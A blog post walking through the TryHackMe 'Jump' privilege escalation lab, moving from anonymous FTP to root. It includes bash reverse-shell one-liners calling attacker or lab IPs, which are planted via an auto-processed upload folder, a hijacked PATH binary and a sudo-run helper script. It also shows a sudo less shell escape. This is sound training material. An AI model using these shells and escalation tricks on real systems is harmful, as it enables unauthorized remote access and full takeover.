Skip to main content
HashnodeCyberWithSharon

Command Palette

Search for a command to run...

Jump (TryHackMe)

Updated
8 min read
Jump (TryHackMe)
J
Jebitok
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

Link to the privilege escalation challenge on TryHackMe: Jump

Challenge

You’ve discovered a misconfigured internal automation pipeline running on a Linux server. The system processes recon scripts, development backups, monitoring jobs, and deployment tasks across multiple users. Each stage of the pipeline relies too heavily on the previous one. By abusing these trust boundaries, you must move laterally through the system.

Your objective is to escalate from anonymous access all the way through:

recon_user → dev_user → monitor_user → ops_user → root

Answer the questions below

What is the flag found in the recon_user’s home directory?

nmap -p- -sV IP_Address

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)

ftp IP_Address
Connected to IP_Address
220 (vsFTPd 3.0.5)
Name (10.112.141.252:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||46836|)
150 Here comes the directory listing.
drwxrwxrwx    2 115      123          4096 Apr 30 06:00 incoming
drwxr-xr-x    4 115      123          4096 Jun 09 08:22 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||29851|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             139 Feb 02 07:19 README.txt
drwxr-xr-x    2 115      123          4096 Feb 01 11:12 archive
drwxrwxrwx    2 115      123          4096 Feb 01 11:12 uploads
226 Directory send OK.
ftp> get README.txt
local: README.txt remote: README.txt
229 Entering Extended Passive Mode (|||49715|)
150 Opening BINARY mode data connection for README.txt (139 bytes).
100% |*************************************************************************************|   139      377.06 KiB/s    00:00 ETA
226 Transfer complete.
139 bytes received in 00:00 (98.22 KiB/s)
ftp> get archives
local: archives remote: archives
229 Entering Extended Passive Mode (|||41683|)
550 Failed to open file.
ftp> get archive
local: archive remote: archive
229 Entering Extended Passive Mode (|||13194|)
550 Failed to open file.
ftp> cd archive
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49853|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||40772|)
150 Here comes the directory listing.
drwxr-xr-x    2 115      123          4096 Feb 01 11:12 .
drwxr-xr-x    4 115      123          4096 Jun 09 08:22 ..
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> cd uploads
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||56647|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||12879|)
150 Here comes the directory listing.
drwxrwxrwx    2 115      123          4096 Feb 01 11:12 .
drwxr-xr-x    4 115      123          4096 Jun 09 08:22 ..
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||6197|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             139 Feb 02 07:19 README.txt
drwxr-xr-x    2 115      123          4096 Feb 01 11:12 archive
drwxrwxrwx    2 115      123          4096 Feb 01 11:12 uploads
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||9375|)
150 Here comes the directory listing.
drwxrwxrwx    2 115      123          4096 Apr 30 06:00 incoming
drwxr-xr-x    4 115      123          4096 Jun 09 08:22 pub
226 Directory send OK.
ftp> cd incoming
250 Directory successfully changed.
ftp> ls 
229 Entering Extended Passive Mode (|||60214|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||17915|)
150 Here comes the directory listing.
drwxrwxrwx    2 115      123          4096 Apr 30 06:00 .
drwxr-xr-x    4 0        0            4096 Feb 02 06:29 ..
226 Directory send OK.

cat README.txt
[ recon pipeline ]

All recon jobs must be placed in incoming/.
Files are processed automatically on arrival.
Invalid formats are ignored.

nc -lvnp 4444

# Create the shell script
echo '#!/bin/bash
bash -i >& /dev/tcp/ATTACK_IP/4444 0>&1' > /tmp/shell.sh

# Upload via FTP
ftp TARGET_IP
# login as anonymous
cd incoming
put /tmp/shell.sh shell.sh

nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.112.141.252 60138
bash: cannot set terminal process group (2494): Inappropriate ioctl for device
bash: no job control in this shell
recon_user@tryhackme-2404:~$ ls
ls
flag.txt
shell.sh
recon_user@tryhackme-2404:~$ cat flag.txt
cat flag.txt
THM{5a3f1c92-7b4e-4d91-8c2a-REDACTED}

What is the flag found in the dev_user’s home directory?

pwd
pwd
/home/recon_user
recon_user@tryhackme-2404:~$ ls /home
ls /home
dev_user
monitor_user
ops_user
recon_user
ubuntu
recon_user@tryhackme-2404:~$ ls /home/dev_user
ls /home/dev_user
flag.txt
recon_user@tryhackme-2404:~$ cat /home/dev_user/flag.txt
cat /home/dev_user/flag.txt
THM{8d2b7a41-3f9c-4e55-b1a2-REDACTED}

What is the flag found in the monitor_user’s home directory?

nc -lvnp 5558

echo '#!/bin/bash
bash -i >& /dev/tcp/10.113.91.143/5558 0>&1' > /opt/dev/bin/ps
chmod +x /opt/dev/bin/ps

nc -lvnp 5556
Listening on 0.0.0.0 5556
Connection received on 10.113.152.106 43516
bash: cannot set terminal process group (4214): Inappropriate ioctl for device
bash: no job control in this shell
dev_user@tryhackme-2404:~$ echo '#!/bin/bash
bash -i >& /dev/tcp/ATTACK_IP/5558 0>&1' > /opt/dev/bin/psecho '#!/bin/bash
> 
bash -i >& /dev/tcp/ATTACK_IP/5558 0>&1' > /opt/dev/bin/ps
dev_user@tryhackme-2404:~$ chmod +x /opt/dev/bin/ps
chmod +x /opt/dev/bin/ps
dev_user@tryhackme-2404:~$ echo '#!/bin/bash
tar -czf /tmp/recon_backup.tgz /home/recon_user' > /opt/dev/backup.shecho '#!/bin/bash
> 
tar -czf /tmp/recon_backup.tgz /home/recon_user' > /opt/dev/backup.sh
dev_user@tryhackme-2404:~$ 

nc -lvnp 5558
Listening on 0.0.0.0 5558
Connection received on 10.113.152.106 47752
bash: cannot set terminal process group (597): Inappropriate ioctl for device
bash: no job control in this shell
monitor_user@tryhackme-2404:/$ cat /home/monitor_user/flag.txt
cat /home/monitor_user/flag.txt
THM{c1e9a7b3-2d44-4a88-9f7e-REDACTED}

What is the flag found in the ops_user’s home directory?

monitor_user@tryhackme-2404:/$ sudo -l
sudo -l
Matching Defaults entries for monitor_user on tryhackme-2404:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty, env_keep+=LESS

User monitor_user may run the following commands on tryhackme-2404:
    (ops_user) NOPASSWD: /usr/local/bin/deploy.sh

cat /usr/local/bin/deploy.sh
cat /usr/local/bin/deploy.sh
#!/bin/bash
cd /opt/app 2>/dev/null
./deploy_helper.sh
monitor_user@tryhackme-2404:/$ sudo -u ops_user LESS='!/bin/bash' /usr/local/bin/deploy.sh
<ops_user LESS='!/bin/bash' /usr/local/bin/deploy.sh
[+] Deploy helper running
[+] Syncing application files

cat /opt/app/deploy_helper.sh
cat /opt/app/deploy_helper.sh
#!/bin/bash
echo "[+] Deploy helper running"
echo "[+] Syncing application files"
sleep 2
monitor_user@tryhackme-2404:/$ ls -la /opt/app/
ls -la /opt/app/
total 16
drwxr-xr-x 3 ops_user     ops_user     4096 Feb  2 15:09 .
drwxr-xr-x 5 root         root         4096 Feb  2 10:03 ..
drwxrwxr-x 2 monitor_user monitor_user 4096 Feb  2 15:09 data
-rwxr-xr-x 1 monitor_user monitor_user   90 Feb  2 14:59 deploy_helper.sh
monitor_user@tryhackme-2404:/$ pwd
pwd
/
monitor_user@tryhackme-2404:/$ ls /home/ops_user
ls /home/ops_user
ls: cannot open directory '/home/ops_user': Permission denied

nc -lvnp 5559

echo '#!/bin/bash
bash -i >& /dev/tcp/10.113.91.187/5559 0>&1' > /opt/app/deploy_helper.sh

sudo -u ops_user /usr/local/bin/deploy.sh

nc -lvnp 5559
Listening on 0.0.0.0 5559
Connection received on 10.113.152.106 44302
bash: cannot set terminal process group (597): Inappropriate ioctl for device
bash: no job control in this shell
ops_user@tryhackme-2404:/opt/app$ pwd
pwd
/opt/app

ops_user@tryhackme-2404:/opt/app$ ls -la /home/ops_user
ls -la /home/ops_user
total 24
drwxr-x--- 2 ops_user ops_user 4096 Apr 26 19:39 .
drwxr-xr-x 7 root     root     4096 Apr 29 10:46 ..
-rw-r--r-- 1 ops_user ops_user  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 ops_user ops_user 3877 Apr 26 19:22 .bashrc
-rw-r--r-- 1 ops_user ops_user  807 Feb 25  2020 .profile
-rw-r--r-- 1 ops_user ops_user   42 Apr 26 19:39 flag.txt

ops_user@tryhackme-2404:/opt/app$ cat /home/ops_user/flag.txt
cat /home/ops_user/flag.txt
THM{f7a2c9d1-6e33-4b55-8d11-REDACTED}

What is the flag found in the root user's home directory?

ops_user@tryhackme-2404:/opt/app$ sudo -l
sudo -l
Matching Defaults entries for ops_user on tryhackme-2404:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty, env_keep+=LESS
User ops_user may run the following commands on tryhackme-2404:
    (root) NOPASSWD: /usr/bin/less

sudo /usr/bin/less /etc/passwd

python3 -c 'import pty; pty.spawn("/bin/bash")'

ops_user@tryhackme-2404:/opt/app$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<pp$ python3 -c 'import pty; pty.spawn("/bin/bash")'
ops_user@tryhackme-2404:/opt/app$ sudo /usr/bin/less /etc/passwd
sudo /usr/bin/less /etc/passwd
WARNING: terminal is not fully functional
Press RETURN to continue 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologi
n
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/n
ologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbi
/etc/passwd!/bin/bash
!/bin/bash


root@tryhackme-2404:/opt/app# whoami
whoami
root
root@tryhackme-2404:/opt/app# cd /root
cd /root
root@tryhackme-2404:~# ls -la
ls -la
total 40
drwx------  5 root root 4096 Apr 26 19:40 .
drwxr-xr-x 22 root root 4096 Jun 23 11:57 ..
-rw-r--r--  1 root root 3212 Apr 26 19:22 .bashrc
-rw-------  1 root root   20 Apr 26 18:31 .lesshst
drwxr-xr-x  3 root root 4096 Oct 22  2024 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   66 Feb  2 06:34 .selected_editor
drwx------  2 root root 4096 Oct 22  2024 .ssh
-rw-r--r--  1 root root   42 Apr 26 19:39 flag.txt
drwxr-xr-x  4 root root 4096 Oct 22  2024 snap
root@tryhackme-2404:~# cat flag.txt
cat flag.txt
THM{2b8e6c4a-1d55-4f90-a3c7-REDACTED}
#linux-privesc#tryhackme#ctf-writeup

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

C

CyberWithSharon

496 posts